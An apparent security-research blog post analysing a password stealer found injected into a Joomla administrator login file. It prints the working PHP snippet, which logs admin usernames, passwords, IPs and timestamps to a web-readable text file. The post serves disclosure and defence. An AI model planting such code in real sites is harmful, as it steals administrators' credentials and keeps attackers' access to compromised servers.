As we know, one of the main payloads of a successful attack is to maintain access to the compromised server for as long as possible. Today we found this simple but effective password stealer for Joomla.
$fh = fopen("components/com_login/models/login.txt", 'a');
date_default_timezone_set("America/Chicago");
fwrite($fh,date('m/d/Y H:i:s', time())." $_SERVER[REMOTE_ADDR] [$credentials[username]:$credentials[password]]\n");
fclose($fh);It was injected in /administrator/components/com_login/models/login.php, and the code just captures the $credentials array, username and password to be more specific, and writes to a login.txt file, which was accessible through the internet.
To make things even easier for the attacker, it writes the date and time of the capture on Chicago Timezone (so is the attacker in Chicago?).
Krasimir Konov
John Castro
Yuliyan Tsvetkov
Luke Leal
Denis Sinegubko
